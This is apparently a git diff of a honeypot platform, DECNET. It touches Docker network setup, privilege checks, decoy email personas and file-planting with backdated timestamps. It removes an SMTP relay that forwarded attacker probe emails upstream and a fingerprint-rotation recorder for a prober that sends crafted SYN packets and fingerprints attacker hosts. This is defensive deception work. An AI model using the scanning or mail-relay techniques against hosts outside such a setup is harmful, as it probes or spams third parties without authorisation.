decky_name = decky["decky_config"]["name"]
added = sorted(set(new_services) - set(old_services))
removed = sorted(set(old_services) - set(new_services))
if added or removed:
await _materialise_decky_services_diff(
repo, topology_id, decky_name, added, removed,
)
if forwards_l3_flipped:
# force was checked above; reaching here means the operator
# opted in. recreate_base re-renders compose first so the
# rebuilt base picks up the new `ports:` block.
await _materialise_decky_recreate_base(
repo, topology_id, decky_name,
)
await _assert_valid_after(repo, topology_id)
async def apply_update_lan(
repo: Any, topology_id: str, payload: dict[str, Any]
) -> None:
"""Update LAN fields — subnet, is_dmz, coords, rename.
Guard rail: ``subnet`` and ``is_dmz`` are pinned at deploy time.
Live deckies bind to the bridge with IPs allocated from the old
subnet (and ``is_dmz`` flips swap the bridge's ``internal=False``
flag, which docker can't change on a network with active
containers). Reject those mutations on active/degraded topologies
rather than rewriting the DB into an incoherent state.
Coord-only updates (``x``/``y``) are layout-only; let them through
unconditionally. Renames pass through too — the bridge's docker
name is keyed off ``_network_name(topology_id, lan_name)``, so a
rename would also need a rebuild — but rename isn't currently a
code path on active topologies; if the operator hits it we still
write the row and let the next deploy reconcile.
"""
"""Update LAN fields — subnet, is_dmz, coords, rename."""
hydrated = await _hydrated(repo, topology_id)
lan = _lan_by_name(hydrated, payload["name"])
if lan is None:
@@ -1017,17 +389,6 @@ async def apply_update_lan(
fields[key] = payload[key]
if not fields:
return
topology = await repo.get_topology(topology_id)
is_live = bool(topology) and topology.status in ("active", "degraded")
if is_live:
hostile = {"subnet", "is_dmz"} & fields.keys()
if hostile:
raise MutationError(
f"cannot change {sorted(hostile)} on a deployed LAN; "
f"teardown + redeploy required"
)
await repo.update_lan(lan["id"], fields)
await _assert_valid_after(repo, topology_id)

View File

@@ -151,20 +151,11 @@ def _ensure_network(
options.update(extra_options)
for net in client.networks.list(names=[MACVLAN_NETWORK_NAME]):
# networks.list() doesn't populate Containers — reload to get the
# full inspect payload (including connected container IDs).
try:
net.reload()
except docker.errors.APIError:
pass
if net.attrs.get("Driver") == driver:
# Same driver — but if the IPAM pool drifted (different subnet,
# gateway, or ip-range than this deploy asks for), reusing it
# hands out addresses from the old pool and we race the real LAN.
# Compare and rebuild on mismatch — but only when no containers
# are attached. With active endpoints Docker refuses the remove
# with 403; just attach to the existing network instead.
# Compare and rebuild on mismatch.
pools = (net.attrs.get("IPAM") or {}).get("Config") or []
cur = pools[0] if pools else {}
if (
@@ -173,15 +164,8 @@ def _ensure_network(
and cur.get("IPRange") == ip_range
):
return # right driver AND matching pool, leave it alone
if net.attrs.get("Containers"):
# Active endpoints — can't safely rebuild. Attach to the
# existing network; IPAM drift on ip_range only affects
# Docker's auto-assign pool, which DECNET doesn't use
# (IPs are always set explicitly in the compose file).
return
# Driver mismatch OR empty-endpoint IPAM drift — tear it down.
# Disconnect any live containers first so `remove()` doesn't
# refuse with ErrNetworkInUse.
# Driver mismatch OR IPAM drift — tear it down. Disconnect any live
# containers first so `remove()` doesn't refuse with ErrNetworkInUse.
for cid in (net.attrs.get("Containers") or {}):
try:
net.disconnect(cid, force=True)
@@ -319,44 +303,11 @@ def remove_bridge_network(client: docker.DockerClient, name: str) -> None:
# Host-side macvlan interface (hairpin fix)
# ---------------------------------------------------------------------------
# Linux capability bit positions — see capabilities(7).
_CAP_NET_ADMIN = 12
def _has_cap_net_admin() -> bool:
"""True if the current process holds CAP_NET_ADMIN in its effective set.
Reads ``/proc/self/status`` rather than calling ``capget(2)`` so we
don't need a libcap dependency. ``CapEff`` is a 64-bit hex bitmask;
bit 12 is CAP_NET_ADMIN.
"""
try:
with open("/proc/self/status", "r") as fh:
for line in fh:
if line.startswith("CapEff:"):
bits = int(line.split()[1], 16)
return bool(bits & (1 << _CAP_NET_ADMIN))
except OSError:
pass
return False
def _require_net_admin() -> None:
"""Reject early if the process can't run ``ip link add ... macvlan``.
CAP_NET_ADMIN is what the kernel actually checks for netlink RTM_NEWLINK
of a macvlan/ipvlan slave; euid==0 is sufficient (it grants every cap)
but not necessary. Prefer the cap check so the systemd unit's
``AmbientCapabilities=CAP_NET_ADMIN`` is honoured without forcing the
whole API to run as root.
"""
if os.geteuid() == 0 or _has_cap_net_admin():
return
raise PermissionError(
"MACVLAN host-side interface setup needs CAP_NET_ADMIN. "
"Either run as root or grant the cap (systemd: "
"AmbientCapabilities=CAP_NET_ADMIN)."
)
def _require_root() -> None:
if os.geteuid() != 0:
raise PermissionError(
"MACVLAN host-side interface setup requires root. Run with sudo."
)
def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str) -> None:
@@ -366,9 +317,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
host-helper first: the two drivers can share a parent NIC on paper but
leaving the opposite helper in place is just cruft after a driver swap.
"""
_require_net_admin()
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
_require_root()
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
@@ -383,7 +332,7 @@ def setup_host_macvlan(interface: str, host_macvlan_ip: str, decky_ip_range: str
def teardown_host_macvlan(decky_ip_range: str) -> None:
_require_net_admin()
_require_root()
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_MACVLAN_IFACE], check=False)
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
@@ -395,9 +344,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
host-helper first so a prior macvlan deploy doesn't leave its slave
dangling on the parent NIC after the driver swap.
"""
_require_net_admin()
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
_require_root()
_run(["ip", "link", "del", HOST_MACVLAN_IFACE], check=False)
@@ -411,7 +358,7 @@ def setup_host_ipvlan(interface: str, host_ipvlan_ip: str, decky_ip_range: str)
def teardown_host_ipvlan(decky_ip_range: str) -> None:
_require_net_admin()
_require_root()
_run(["ip", "route", "del", decky_ip_range, "dev", HOST_IPVLAN_IFACE], check=False)
_run(["ip", "link", "del", HOST_IPVLAN_IFACE], check=False)
@@ -431,47 +378,3 @@ def ips_to_range(ips: list[str]) -> str:
strict=False,
)
return str(network)
# ---------------------------------------------------------------------------
# Container veth resolution (for tc netem tarpit)
# ---------------------------------------------------------------------------
def get_container_pid(container_name: str) -> int:
"""Return the PID of a running container's init process."""
client = docker.from_env()
try:
container = client.containers.get(container_name)
except docker.errors.NotFound:
raise LookupError(f"container {container_name!r} not found")
pid = container.attrs["State"]["Pid"]
if not pid:
raise LookupError(f"container {container_name!r} is not running (PID=0)")
return pid
def get_container_veth(container_name: str) -> str:
"""Return the host veth interface name paired to container_name's eth0.
Reads /sys/class/net/eth0/iflink from inside the container to get the
peer interface index, then matches it against ``ip link show`` on the host.
Requires no nsenter and no elevated privileges beyond what Docker exec grants.
"""
result = _run(
["docker", "exec", container_name, "cat", "/sys/class/net/eth0/iflink"],
check=False,
)
if result.returncode != 0:
raise LookupError(
f"container {container_name!r} not reachable: {result.stderr.strip()}"
)
peer_index = result.stdout.strip()
links = _run(["ip", "link", "show"])
for line in links.stdout.splitlines():
if line.startswith(f"{peer_index}:"):
# Format: "42: veth3a4b5c@if41: <BROADCAST,...>"
iface = line.split(":")[1].strip().split("@")[0]
return iface
raise LookupError(
f"no host veth found for container {container_name!r} (peer ifindex {peer_index})"
)

View File

@@ -65,7 +65,7 @@ def get_driver_for(action: Action) -> ActivityDriver:
try:
from decnet.orchestrator.emailgen.scheduler import EmailAction
except ImportError: # pragma: no cover - scheduler always exists
EmailAction = None # type: ignore[assignment, misc]
EmailAction = None # type: ignore[assignment]
if EmailAction is not None and isinstance(action, EmailAction):
from decnet.orchestrator.drivers.email import EmailDriver
return EmailDriver()

View File

@@ -176,7 +176,7 @@ class EmailDriver(ActivityDriver):
"""Convenience accessor for telemetry / logging."""
return self._llm.model
async def run(self, action: EmailAction) -> ActivityResult: # type: ignore[override]
async def run(self, action: EmailAction) -> ActivityResult:
return await self._run_email(action)
async def _run_email(self, action: EmailAction) -> ActivityResult:

View File

@@ -1,80 +0,0 @@
"""SMTP probe-relay driver.
Forwards the attacker's first probe email via the master's real internet
connection. The smtp_relay decky runs on MACVLAN and has no gateway access;
the master (where this worker runs) does.
Called by the realism worker's smtp probe listener, not the main tick loop.
"""
from __future__ import annotations
import email
import smtplib
from pathlib import Path
from typing import Any
_ARTIFACTS_ROOT_DEFAULT = "/var/lib/decnet/artifacts"
def _ensure_from_header(body: bytes, mail_from: str) -> bytes:
"""Return body with a From: header added if one is absent."""
try:
msg = email.message_from_bytes(body)
except Exception:
return body
if msg["From"]:
return body
# Prepend the header before the existing content.
header_line = f"From: {mail_from}\r\n".encode()
return header_line + body
def forward_probe(
*,
svc_cfg: dict[str, Any],
stored_as: str,
decky_name: str,
mail_from: str,
rcpt_to: list[str],
artifacts_root: str = _ARTIFACTS_ROOT_DEFAULT,
) -> tuple[bool, str]:
"""Read the .eml from disk and forward it via the upstream relay.
Returns (True, "") on success or (False, reason) on failure.
Always safe to call in a thread — uses only blocking I/O.
"""
upstream_host = (svc_cfg.get("upstream_host") or "").strip()
if not upstream_host:
return False, "upstream_host not configured"
eml_path = Path(artifacts_root) / decky_name / "smtp" / stored_as
try:
body = eml_path.read_bytes()
except OSError as exc:
return False, f"cannot read eml: {exc}"
if not rcpt_to:
return False, "no recipients"
upstream_port = int(svc_cfg.get("upstream_port") or 25)
upstream_user = (svc_cfg.get("upstream_user") or "").strip()
upstream_pass = (svc_cfg.get("upstream_pass") or "").strip()
envelope_from = (svc_cfg.get("upstream_sender") or "").strip() or mail_from
# Ensure the message has a From: header so mail clients show the attacker's
# address rather than falling back to the envelope sender (upstream_sender).
# Minimal relay-test scripts often omit headers entirely.
body = _ensure_from_header(body, mail_from)
try:
with smtplib.SMTP(upstream_host, upstream_port, timeout=15) as conn:
conn.ehlo()
if conn.has_extn("STARTTLS"):
conn.starttls()
conn.ehlo()
if upstream_user and upstream_pass:
conn.login(upstream_user, upstream_pass)
conn.sendmail(envelope_from, rcpt_to, body)
return True, ""
except Exception as exc:
return False, str(exc)[:256]

View File

@@ -18,8 +18,11 @@ or IP can't escape into a shell.
from __future__ import annotations
import asyncio
import shlex
from typing import Any
from datetime import datetime
import base64
from datetime import datetime, timezone
from decnet.logging import get_logger
from decnet.orchestrator.drivers.base import ActivityDriver, ActivityResult
@@ -223,24 +226,36 @@ class SSHDriver(ActivityDriver):
) -> ActivityResult:
"""Write *content* to *path* inside *decky_name*'s ssh container.
Delegates to :func:`decnet.decky_io.write_file_to_container`,
which carries the ARG_MAX-safe base64-via-stdin trick. Sets
file mode and, when *mtime* is provided, ``touch -d`` to
backdate the file (otherwise everything stamps at wall-clock-now
— the realism failure this path was originally fixing).
Streams base64 via stdin (mirrors :mod:`decnet.canary.planter`'s
ARG_MAX-safe write — see commit c17b9e0). Sets file mode and,
when *mtime* is provided, ``touch -d`` to backdate the file so
it doesn't all stamp at wall-clock-now (the realism failure
this migration is fixing).
"""
from decnet.decky_io import write_file_to_container
container = _container_for(decky_name)
success, error = await write_file_to_container(
container, path, content, mode=mode, mtime=mtime, timeout=_TIMEOUT,
b64 = base64.b64encode(content).decode("ascii")
# touch -d accepts ISO 8601; we always emit UTC so the
# container's local TZ doesn't drift the mtime.
if mtime is not None:
ts = mtime.astimezone(timezone.utc).strftime("%Y-%m-%d %H:%M:%S UTC")
touch_cmd = f"touch -d {shlex.quote(ts)} {shlex.quote(path)}"
else:
touch_cmd = f"touch {shlex.quote(path)}"
sh_cmd = (
f"mkdir -p {shlex.quote(_dirname(path))} && "
f"base64 -d > {shlex.quote(path)} && "
f"chmod {mode:o} {shlex.quote(path)} && "
f"{touch_cmd}"
)
argv = [_DOCKER, "exec", "-i", container, "sh", "-c", sh_cmd]
rc, _stdout, stderr = await _run_with_stdin(argv, b64.encode("ascii"))
success = rc == 0
payload: dict[str, Any] = {
"dst_decky": decky_name,
"path": path,
"bytes": len(content),
"rc": 0 if success else 1,
"stderr": error if not success else None,
"rc": rc,
"stderr": stderr.strip()[:256] if not success else None,
}
return ActivityResult(success=success, payload=payload)
@@ -268,3 +283,11 @@ class SSHDriver(ActivityDriver):
)
def _dirname(path: str) -> str:
"""Pure-string dirname. We can't trust ``os.path.dirname`` on the
host to share the destination container's separator semantics, but
deckies are POSIX so a plain ``rfind('/')`` suffices."""
idx = path.rfind("/")
if idx <= 0:
return "/"
return path[:idx]

View File

@@ -131,13 +131,13 @@ async def _resolve_personas(
topology = await repo.get_topology(topology_id)
if not topology:
return [], source
if isinstance(topology, dict):
raw = topology.get("email_personas")
lang = topology.get("language_default") or "en"
else:
raw = topology.email_personas
lang = topology.language_default or "en"
return parse_personas(raw, language_default=lang), source
return (
parse_personas(
topology.get("email_personas"),
language_default=topology.get("language_default") or "en",
),
source,
)
# Fleet / shard / anything else → global pool.
return global_pool.load(), source
@@ -175,7 +175,7 @@ async def pick(
)
return None
active = [p for p in personas if in_active_hours(p, now_dt)]
active = [p for p in personas if in_active_hours(p, now_dt.hour)]
if len(active) < 2:
logger.debug(
"emailgen pick: source=%s mail_decky=%s only %d personas in-hours",

View File

@@ -311,22 +311,17 @@ async def _resolve_personas(
return enriched
def _topology_personas(topology) -> list[EmailPersona]:
def _topology_personas(topology: Optional[dict[str, Any]]) -> list[EmailPersona]:
if not topology:
return []
if isinstance(topology, dict):
raw = topology.get("email_personas")
lang = topology.get("language_default") or "en"
else:
raw = topology.email_personas
lang = topology.language_default or "en"
raw = topology.get("email_personas")
if raw is None:
return []
if isinstance(raw, list):
return parse_personas(raw, language_default=lang)
return parse_personas(raw, language_default=topology.get("language_default") or "en")
if isinstance(raw, str):
try:
return parse_personas(json.loads(raw), language_default=lang)
return parse_personas(json.loads(raw), language_default=topology.get("language_default") or "en")
except json.JSONDecodeError:
return []
return []

View File

@@ -25,7 +25,6 @@ import secrets
from datetime import datetime, timezone
from typing import Any, Optional
from decnet.bus import topics as _topics
from decnet.bus.factory import get_bus
from decnet.bus.publish import (
publish_safely,
@@ -35,7 +34,6 @@ from decnet.bus.publish import (
from decnet.logging import get_logger
from decnet.orchestrator import events, scheduler
from decnet.orchestrator.drivers import get_driver_for
from decnet.orchestrator.drivers.smtp_relay import forward_probe
from decnet.orchestrator.emailgen import (
events as email_events,
scheduler as email_scheduler,
@@ -129,7 +127,6 @@ async def orchestrator_worker(
# operator's intent rather than the baked-in defaults. A failure
# here logs and falls through; the planner already holds defaults.
await _refresh_realism_config(repo)
await _refresh_llm_config(repo)
shutdown = asyncio.Event()
heartbeat_task = asyncio.create_task(
@@ -141,9 +138,6 @@ async def orchestrator_worker(
control_task = asyncio.create_task(
run_control_listener(bus, "orchestrator", shutdown),
)
probe_task = asyncio.create_task(
_run_smtp_probe_listener(repo, shutdown),
)
tick_n = 0
try:
while not shutdown.is_set():
@@ -162,9 +156,8 @@ async def orchestrator_worker(
await _periodic_prune(repo)
if tick_n % _REALISM_CONFIG_REFRESH_TICKS == 0:
await _refresh_realism_config(repo)
await _refresh_llm_config(repo)
finally:
for t in (heartbeat_task, control_task, probe_task):
for t in (heartbeat_task, control_task):
t.cancel()
with contextlib.suppress(Exception, asyncio.CancelledError):
await t
@@ -225,18 +218,6 @@ async def _refresh_realism_config(repo: BaseRepository) -> None:
logger.warning("realism config refresh: rejected payload: %s", exc)
async def _refresh_llm_config(repo: BaseRepository) -> None:
"""Pull operator-tuned LLM config from realism_config into the backend cache."""
from decnet.realism.llm.config import apply, load_from_db
cfg = await load_from_db(repo)
if cfg is None:
return
try:
apply(cfg)
except Exception as exc: # noqa: BLE001
logger.warning("llm config refresh: apply failed: %s", exc)
def _roll_action_kind(rng: secrets.SystemRandom) -> str:
total = sum(w for _, w in _ACTION_WEIGHTS)
target = rng.randint(1, total)
@@ -322,7 +303,7 @@ async def _pick_action(
)
elif kind == "email":
try:
action = await email_scheduler.pick(repo, rand=rng) # type: ignore[assignment]
action = await email_scheduler.pick(repo, rand=rng)
except Exception as exc: # noqa: BLE001
logger.debug("orchestrator: email pick failed: %s", exc)
action = None
@@ -486,100 +467,6 @@ async def _bump_synthetic_file_after_edit(repo, action, result) -> None:
await repo.update_synthetic_file(action.synthetic_file_uuid, patch)
async def _run_smtp_probe_listener(
repo: BaseRepository,
shutdown: asyncio.Event,
) -> None:
"""Subscribe to smtp.probe.pending and forward probe emails upstream.
Runs as a long-lived subtask alongside the tick loop. When a probe lands
we check if this (attacker_ip, decky) has already been forwarded up to
probe_limit times — if not, forward via the master's real internet
connection and store a probe_relay bounty with the result.
"""
try:
bus = get_bus(client_name="orchestrator-probe")
await bus.connect()
sub = bus.subscribe(_topics.smtp("probe.pending"))
async with sub:
async for event in sub:
if shutdown.is_set():
break
try:
await _handle_probe_pending(repo, event.payload)
except Exception as exc: # noqa: BLE001
logger.warning("smtp probe listener: handle error: %s", exc)
except asyncio.CancelledError:
raise
except Exception as exc: # noqa: BLE001
logger.warning("smtp probe listener: bus unavailable: %s", exc)
finally:
with contextlib.suppress(Exception):
await bus.close()
async def _handle_probe_pending(repo: BaseRepository, payload: dict) -> None:
decky_name = (payload.get("decky") or "").strip()
attacker_ip = (payload.get("attacker_ip") or "").strip()
stored_as = (payload.get("stored_as") or "").strip()
mail_from = (payload.get("mail_from") or "").strip()
rcpt_to_raw = (payload.get("rcpt_to") or "").strip()
if not (decky_name and attacker_ip and stored_as):
return
decky_row = await repo.get_fleet_decky_by_name(decky_name)
if not decky_row:
return
svc_cfg = (
(decky_row.get("decky_config") or {})
.get("service_config", {})
.get("smtp_relay") or {}
)
if not (svc_cfg.get("upstream_host") or "").strip():
return
probe_limit = int(svc_cfg.get("probe_limit") or 1)
already_sent = await repo.count_probe_relays(attacker_ip, decky_name)
if already_sent >= probe_limit:
return
rcpt_to = [r.strip() for r in rcpt_to_raw.split(",") if r.strip()]
artifacts_root = os.environ.get("DECNET_ARTIFACTS_ROOT", "/var/lib/decnet/artifacts")
loop = asyncio.get_event_loop()
ok, reason = await loop.run_in_executor(
None,
lambda: forward_probe(
svc_cfg=svc_cfg,
stored_as=stored_as,
decky_name=decky_name,
mail_from=mail_from,
rcpt_to=rcpt_to,
artifacts_root=artifacts_root,
),
)
await repo.add_bounty({
"decky": decky_name,
"service": "smtp_relay",
"attacker_ip": attacker_ip,
"bounty_type": "probe_relay",
"payload": {
"stored_as": stored_as,
"forwarded": ok,
**({"fwd_error": reason} if not ok else {}),
},
})
if ok:
logger.info("smtp probe forwarded decky=%s ip=%s", decky_name, attacker_ip)
else:
logger.warning(
"smtp probe forward failed decky=%s ip=%s error=%s",
decky_name, attacker_ip, reason,
)
async def _record_synthetic_file(repo, action) -> None:
"""Persist (or patch) a synthetic_files row after a FileAction plant.

View File

@@ -48,7 +48,7 @@ def _send_syn(
Craft a TCP SYN with common options and send it. Returns the
SYN-ACK response packet or None on timeout/failure.
"""
from scapy.all import IP, TCP, conf, sr1 # type: ignore[attr-defined]
from scapy.all import IP, TCP, conf, sr1
# Suppress scapy's noisy output
conf.verb = 0
@@ -83,7 +83,7 @@ def _send_syn(
return None
# Verify it's a SYN-ACK (flags == 0x12)
from scapy.all import TCP as TCPLayer # type: ignore[attr-defined]
from scapy.all import TCP as TCPLayer
if not resp.haslayer(TCPLayer):
return None
if resp[TCPLayer].flags != 0x12: # SYN-ACK
@@ -103,7 +103,7 @@ def _send_rst(
) -> None:
"""Send RST to clean up the half-open connection."""
try:
from scapy.all import IP, TCP, send # type: ignore[attr-defined]
from scapy.all import IP, TCP, send
rst = (
IP(dst=host)
/ TCP(
@@ -124,7 +124,7 @@ def _parse_synack(resp: Any) -> dict[str, Any]:
"""
Extract fingerprint fields from a scapy SYN-ACK response packet.
"""
from scapy.all import IP, TCP # type: ignore[attr-defined]
from scapy.all import IP, TCP
ip_layer = resp[IP]
tcp_layer = resp[TCP]

View File

@@ -27,9 +27,6 @@ from datetime import datetime, timezone
from pathlib import Path
from typing import Any, Callable
from sqlalchemy.engine import Engine
from sqlmodel import Session
from decnet.bus import topics as _topics
from decnet.bus.base import BaseBus
from decnet.bus.factory import get_bus
@@ -38,10 +35,6 @@ from decnet.bus.publish import (
run_control_listener,
run_health_heartbeat,
)
from decnet.correlation.fingerprint_rotation import (
ProbeType,
record_fingerprint,
)
from decnet.logging import get_logger
from decnet.prober.hassh import hassh_server
from decnet.prober.jarm import JARM_EMPTY_HASH, jarm_hash
@@ -51,21 +44,6 @@ from decnet.telemetry import traced as _traced
logger = get_logger("prober")
def _build_sync_engine() -> Engine:
"""Construct a sync SQLite engine for rotation-detection state.
Used inline by the prober; it lives outside the async repository
layer because rotation detection is a sync hook on a sync probe
path. Honors the same defaulting as
``decnet.web.db.sqlite.repository.SQLiteRepository``.
"""
import os
from decnet.config import _ROOT
from decnet.web.db.sqlite.database import get_sync_engine
db_path = os.environ.get("DECNET_DB_PATH", str(_ROOT / "decnet.db"))
return get_sync_engine(db_path)
# ─── Default ports per probe type ───────────────────────────────────────────
# JARM: common C2 callback / TLS server ports
@@ -255,14 +233,6 @@ def _discover_attackers(json_path: Path, position: int) -> tuple[set[str], int]:
ProbePublishFn = Callable[[str, dict[str, Any]], None]
# Rotation recorder: takes (attacker_ip, port, probe_type, new_hash) and
# performs the rotation-detection upsert + derived-event emission for the
# DEBT-032 substrate-fingerprint flow. Optional; when None the prober
# behaves exactly as before (raw fingerprint emit only, no rotation
# detection). Construction lives at worker startup so phase functions
# don't have to know about the DB engine.
RotationRecorderFn = Callable[[str, int, "ProbeType", str], None]
@_traced("prober.probe_cycle")
def _probe_cycle(
@@ -275,7 +245,6 @@ def _probe_cycle(
json_path: Path,
timeout: float = 5.0,
publish_fn: ProbePublishFn | None = None,
record_rotation: RotationRecorderFn | None = None,
) -> None:
"""
Probe all known attacker IPs with JARM, HASSH, and TCP/IP fingerprinting.
@@ -294,13 +263,13 @@ def _probe_cycle(
ip_probed = probed.setdefault(ip, {})
# Phase 1: JARM (TLS fingerprinting)
_jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn, record_rotation)
_jarm_phase(ip, ip_probed, jarm_ports, log_path, json_path, timeout, publish_fn)
# Phase 2: HASSHServer (SSH fingerprinting)
_hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn, record_rotation)
_hassh_phase(ip, ip_probed, ssh_ports, log_path, json_path, timeout, publish_fn)
# Phase 3: TCP/IP stack fingerprinting
_tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn, record_rotation)
_tcpfp_phase(ip, ip_probed, tcpfp_ports, log_path, json_path, timeout, publish_fn)
@_traced("prober.jarm_phase")
@@ -312,7 +281,6 @@ def _jarm_phase(
json_path: Path,
timeout: float,
publish_fn: ProbePublishFn | None = None,
record_rotation: RotationRecorderFn | None = None,
) -> None:
"""JARM-fingerprint an IP on the given TLS ports."""
done = ip_probed.setdefault("jarm", set())
@@ -333,8 +301,6 @@ def _jarm_phase(
msg=f"JARM {ip}:{port} = {h}",
)
logger.info("prober: JARM %s:%d = %s", ip, port, h)
if record_rotation is not None:
record_rotation(ip, port, "jarm", h)
if publish_fn is not None:
publish_fn(
"jarm",
@@ -421,7 +387,6 @@ def _hassh_phase(
json_path: Path,
timeout: float,
publish_fn: ProbePublishFn | None = None,
record_rotation: RotationRecorderFn | None = None,
) -> None:
"""HASSHServer-fingerprint an IP on the given SSH ports."""
done = ip_probed.setdefault("hassh", set())
@@ -447,8 +412,6 @@ def _hassh_phase(
msg=f"HASSH {ip}:{port} = {result['hassh_server']}",
)
logger.info("prober: HASSH %s:%d = %s", ip, port, result["hassh_server"])
if record_rotation is not None:
record_rotation(ip, port, "hassh", result["hassh_server"])
if publish_fn is not None:
publish_fn(
"hassh",
@@ -482,7 +445,6 @@ def _tcpfp_phase(
json_path: Path,
timeout: float,
publish_fn: ProbePublishFn | None = None,
record_rotation: RotationRecorderFn | None = None,
) -> None:
"""TCP/IP stack fingerprint an IP on the given ports."""
done = ip_probed.setdefault("tcpfp", set())
@@ -516,8 +478,6 @@ def _tcpfp_phase(
msg=f"TCPFP {ip}:{port} = {result['tcpfp_hash']}",
)
logger.info("prober: TCPFP %s:%d = %s", ip, port, result["tcpfp_hash"])
if record_rotation is not None:
record_rotation(ip, port, "tcpfp", result["tcpfp_hash"])
if publish_fn is not None:
publish_fn(
"tcpfp",
@@ -626,61 +586,6 @@ async def prober_worker(
event_type,
)
# Substrate-rotation detection (DEBT-032) — open a sync engine for
# the prober's lifetime; recorder closes a session per call so we
# never hold a connection across phase boundaries. Failure to
# connect is non-fatal: probes continue, rotation detection is
# silently disabled.
rotation_engine: Engine | None = None
record_rotation: RotationRecorderFn | None = None
try:
rotation_engine = _build_sync_engine()
except Exception as exc: # noqa: BLE001
logger.warning(
"prober: rotation-detection DB unavailable, "
"running with rotation detection disabled: %s", exc,
)
if rotation_engine is not None:
def _publish_rotation(event_type: str, payload: dict[str, Any]) -> None:
raw_publish(
_topics.attacker(_topics.ATTACKER_FINGERPRINT_ROTATED),
payload,
event_type,
)
def _syslog_rotation(event_type: str, payload: dict[str, Any]) -> None:
_write_event(
log_path, json_path,
"fingerprint_rotated",
target_ip=payload["attacker_ip"],
target_port=str(payload["port"]),
probe_type=payload["probe_type"],
old_hash=payload.get("old_hash") or "",
new_hash=payload["new_hash"],
rotation_count=str(payload["rotation_count"]),
msg=(
f"FP rotation {payload['attacker_ip']}:{payload['port']} "
f"{payload['probe_type']} {payload.get('old_hash')}"
f"{payload['new_hash']}"
),
)
def record_rotation(
ip: str, port: int, probe_type: ProbeType, new_hash: str,
) -> None:
with Session(rotation_engine) as session:
record_fingerprint(
session,
attacker_ip=ip,
port=port,
probe_type=probe_type,
new_hash=new_hash,
ts=datetime.now(timezone.utc),
publish_fn=_publish_rotation,
syslog_fn=_syslog_rotation,
)
shutdown = asyncio.Event()
heartbeat_task = asyncio.create_task(run_health_heartbeat(bus, "prober"))
control_task = asyncio.create_task(
@@ -707,7 +612,6 @@ async def prober_worker(
jarm_ports, hassh_ports, tcp_ports,
log_path, json_path, timeout,
_publish_attacker,
record_rotation,
)
try:
@@ -722,6 +626,3 @@ async def prober_worker(
if bus is not None:
with contextlib.suppress(Exception):
await bus.close()
if rotation_engine is not None:
with contextlib.suppress(Exception):
rotation_engine.dispose()

View File

@@ -1,25 +0,0 @@
"""BEHAVE-SHELL extraction engine — DECNET's official implementation.
Per ``development/BEHAVE-EXTRACTOR.md``: this package is a pure
library. Workers (``BEHAVE-INTEGRATION.md`` Phase 4) own I/O, bus
emission, and persistence. The engine just turns one PTY session into
``Iterable[Observation]``.
BEHAVE is the spec; DECNET is the engine.
"""
from __future__ import annotations
from decnet.profiler.behave_shell.extract import (
DEFAULT_SOURCE,
build_context,
extract_session,
)
# Phase H.5-pre: extractor is feature-complete (37/37 Tier-A primitives
# emit; calibration grid honest). The ``-pre`` suffix stays until
# ``BEHAVE-INTEGRATION.md`` Phase 4 lands the worker wiring + observations
# table writes + AttackerDetail panel; only then does H.5 proper drop the
# suffix and tag v0.
__version__ = "0.1.0-pre"
__all__ = ["DEFAULT_SOURCE", "build_context", "extract_session", "__version__"]

View File

@@ -1,573 +0,0 @@
"""SessionContext: precomputed bundle every feature function reads from.
A naïve engine re-walks the event stream once per primitive. We don't
do that — one walk over the events builds this context, every feature
reads from it. Adding a new feature is O(1) cost on the parse side.
Step 1 fills ``iats`` (inter-key intervals between input events) and
``paste_bursts`` (contiguous runs of paste-class events). Step 4
will fill ``commands`` / ``inter_cmd_iats`` / ``output_per_cmd``.
"""
from __future__ import annotations
import math
from dataclasses import dataclass, field
from typing import Iterable, Mapping
from decnet.profiler.behave_shell._intent import (
LEXEME_MAX_LEN,
NEGATIVE_LEXEMES,
OBSCENITY_LEXEMES,
POSITIVE_LEXEMES,
)
from decnet.profiler.behave_shell._parse import (
AsciinemaEvent,
Command,
PasteBurst,
PromptLine,
detect_error_in_output,
extract_prompt_lines,
hash_token,
strip_ansi,
)
from decnet.profiler.behave_shell._thresholds import (
IKI_THINK_MAX_S,
LAYOUT_BIGRAM_TOP_N,
PASTE_BURST_MAX_IAT_S,
PASTE_MIN_CHARS_PER_EVENT,
PROMPT_LINE_MAX_CHARS,
SHORTCUT_CTRL_BYTES,
)
@dataclass(frozen=True, slots=True)
class _LexCounters:
"""Lexical counters from the typed-text walk (G.0).
Internal to the ctx-builder; flattened onto SessionContext fields
in :func:`build_session_context`.
"""
obscenity_hits: int = 0
positive_lex_hits: int = 0
negative_lex_hits: int = 0
caps_run_max: int = 0
bang_run_max: int = 0
@dataclass(frozen=True, slots=True)
class SessionContext:
sid: str
source: str
evidence_ref: str
t_start: float
t_end: float
duration_s: float
input_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
output_events: tuple[AsciinemaEvent, ...] = field(default_factory=tuple)
# Step 1 derivations
iats: tuple[float, ...] = field(default_factory=tuple)
paste_bursts: tuple[PasteBurst, ...] = field(default_factory=tuple)
paste_event_count: int = 0
# Step 4 derivations — command segmentation
commands: tuple[Command, ...] = field(default_factory=tuple)
inter_cmd_iats: tuple[float, ...] = field(default_factory=tuple)
output_per_cmd: tuple[int, ...] = field(default_factory=tuple)
# Step B.1 derivations — typing bursts (IATs split at think-pauses)
typing_bursts: tuple[tuple[float, ...], ...] = field(default_factory=tuple)
# Step B.3 derivations — error-correction signals
backspace_count: int = 0
backspace_iats: tuple[float, ...] = field(default_factory=tuple)
kill_line_count: int = 0
# Step B.4 derivations — per-command intra-typing IATs
intra_command_iats: tuple[tuple[float, ...], ...] = field(default_factory=tuple)
# Step F.0 derivations — PS1 prompt lines detected in the output stream
prompt_lines: tuple[PromptLine, ...] = field(default_factory=tuple)
# Step F.4 derivations — typed-only character histograms for keyboard
